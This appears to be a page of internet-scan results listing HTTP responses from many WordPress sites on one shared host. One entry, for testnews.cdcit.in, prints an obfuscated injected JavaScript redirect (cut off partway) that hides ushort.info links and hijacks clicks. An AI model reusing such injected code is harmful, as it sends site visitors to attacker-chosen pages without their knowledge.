    x-redirect-by: WordPress
    location: https://walchakpouredwalls.com/
    content-length: 0
    date: Mon, 22 Dec 2025 23:28:22 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.gigachud.net

    2025-12-22 22:18

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://gigachud.net/
    content-length: 0
    date: Mon, 22 Dec 2025 22:18:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.aiagora.net

    2025-12-22 21:57

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://aiagora.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 21:57:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · goseguros.devdecimosite2025.com

    2025-12-22 21:41

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://goseguros.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://goseguros.devdecimosite2025.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://goseguros.devdecimosite2025.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 2f3_front,2f3_URL.6666cd76f96956469e7be39d750cc7d9,2f3_F,2f3_Po.7,2f3_PGS,2f3_
    etag: "1526-1766439672;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 21:41:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.redarkgroup.com

    2025-12-22 20:59

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://redarkgroup.com/
    content-length: 0
    date: Mon, 22 Dec 2025 20:59:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rwd.ae

    2025-12-22 20:27

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://www.rwd.ae/wp-json/>; rel="https://api.w.org/"
    link: <https://www.rwd.ae/wp-json/wp/v2/pages/330>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://www.rwd.ae/>; rel=shortlink
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 20:27:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · pahesn.org

    2025-12-22 20:26

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-pingback: https://pahesn.org/xmlrpc.php
    link: <https://pahesn.org/wp-json/>; rel="https://api.w.org/"
    link: <https://pahesn.org/wp-json/wp/v2/pages/315>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://pahesn.org/>; rel=shortlink
    etag: "47-1766167309;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 20:26:08 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · aiagora.net

    2025-12-22 20:07

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://aiagora.net/wp-json/>; rel="https://api.w.org/"
    link: <https://aiagora.net/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://aiagora.net/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 804_front,804_URL.6666cd76f96956469e7be39d750cc7d9,804_F,804_Po.10,804_PGS,804_
    etag: "728-1766434038;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 20:07:18 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.videoeditorusa.com

    2025-12-22 20:05

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://videoeditorusa.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 20:05:45 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · promosambevcr.devdecimosite2025.com

    2025-12-22 19:58

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://promosambevcr.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://promosambevcr.devdecimosite2025.com/wp-json/wp/v2/pages/797>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://promosambevcr.devdecimosite2025.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: f90_front,f90_URL.6666cd76f96956469e7be39d750cc7d9,f90_F,f90_Po.797,f90_PGS,f90_
    etag: "1524-1766433523;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 19:58:43 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.bestdevicenation.com

    2025-12-22 19:48

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1602
    date: Mon, 22 Dec 2025 19:48:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="182461095">2025-09-30 19:38</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="error_log"><a href="/error_log"><img class="icon" src="/_autoindex/assets/icons/file.svg" alt="File">error_log</a></td><td data-sort="1761131958">2025-10-22 11:19</td><td data-sort="2242">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.bestdevicenation.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.brilliantsit.com

    2025-12-22 19:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Mon, 22 Dec 2025 19:39:23 GMT
    server: LiteSpeed
    location: https://ninetyninecreatives.com/
    vary: Accept-Encoding
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.mall.goodybuy.xyz

    2025-12-22 19:34

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    set-cookie: ibx_wpfomo_ip=142.93.129.190; expires=Thu, 22-Jan-2026 19:34:35 GMT; Max-Age=2678400; path=/; secure
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://mall.goodybuy.xyz/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 19:34:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.testnews.cdcit.in

    2025-12-22 19:21

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://testnews.cdcit.in/
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: e55_front,e55_URL.6666cd76f96956469e7be39d750cc7d9,e55_F,e55_Po.26,e55_PGS,e55_
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 19:21:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x58\x6c\x7a\x33\x63\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x69\x46\x62\x35\x63\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4f\x4a\x66\x38\x63\x348','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x66\x62\x51\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4c\x76\x55\x34\x63\x334','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x62\x42\x4f\x37\x63\x307','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x57\x4e\x4a\x32\x63\x332','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x6d\x4a\x68\x36\x63\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.chatdesk.cl

    2025-12-22 19:16

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-dns-prefetch-control: on
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://chatdesk.cl/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 19:16:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · open-iptv.net

    2025-12-22 18:56

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://open-iptv.net/wp-json/>; rel="https://api.w.org/"
    etag: "8219-1766396463;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 18:56:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.pahesn.org

    2025-12-22 18:52

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-pingback: https://pahesn.org/xmlrpc.php
    x-redirect-by: WordPress
    location: https://pahesn.org/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 18:52:07 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.platonika.study

    2025-12-22 18:48

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    set-cookie: pll_language=en; expires=Tue, 22-Dec-2026 18:48:41 GMT; Max-Age=31536000; path=/; secure; SameSite=Lax
    x-redirect-by: WordPress
    location: https://platonika.study/
    cache-control: public, max-age=0
    expires: Mon, 22 Dec 2025 18:48:41 GMT
    content-length: 0
    date: Mon, 22 Dec 2025 18:48:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.goseguros.devdecimosite2025.com

    2025-12-22 18:47

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://goseguros.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 18:47:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · hmq.devdecimosite2025.com

    2025-12-22 18:40

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://hmq.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://hmq.devdecimosite2025.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://hmq.devdecimosite2025.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 6da_front,6da_URL.6666cd76f96956469e7be39d750cc7d9,6da_F,6da_Po.7,6da_PGS,6da_
    etag: "1521-1766428855;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 18:40:55 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · goodybuy.xyz

    2025-12-22 18:31

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://goodybuy.xyz/wp-json/>; rel="https://api.w.org/"
    etag: "43013-1766398658;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 18:31:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · dubaiforkliftrental.com

    2025-12-22 18:13

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.dubaiforkliftrental.com/
    x-litespeed-cache: hit
    content-length: 0
    date: Mon, 22 Dec 2025 18:13:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.briliantsit.com

    2025-12-22 17:51

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://www.briliantsit.com/wp-json/>; rel="https://api.w.org/"
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 196_home,196_URL.6666cd76f96956469e7be39d750cc7d9,196_F,196_
    etag: "914-1766425883;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 17:51:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.atrixio.co.uk

    2025-12-22 17:50

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://atrixio.co.uk/
    cache-control: public, max-age=0
    expires: Mon, 22 Dec 2025 17:50:16 GMT
    content-length: 0
    date: Mon, 22 Dec 2025 17:50:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · mendahealth.com

    2025-12-22 17:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-powered-by: SitePad
    link: <https://mendahealth.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 17:37:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · mantragacor.pro

    2025-12-22 17:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1366
    date: Mon, 22 Dec 2025 17:33:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="189416412">2025-12-20 07:40</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at mantragacor.pro Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · mantragacor.pro

    2025-12-22 17:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1367
    date: Mon, 22 Dec 2025 17:33:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="189416412">2025-12-20 07:40</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at mantragacor.pro Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.mantragacor.pro

    2025-12-22 17:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1371
    date: Mon, 22 Dec 2025 17:33:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="189416412">2025-12-20 07:40</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.mantragacor.pro Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.mantragacor.pro

    2025-12-22 17:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1370
    date: Mon, 22 Dec 2025 17:33:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="189416412">2025-12-20 07:40</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.mantragacor.pro Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.walchaksurfacecoatings.com

    2025-12-22 17:26

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://walchaksurfacecoatings.com/
    content-length: 0
    date: Mon, 22 Dec 2025 17:26:27 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.bokitas.devdecimosite2025.com

    2025-12-22 17:21

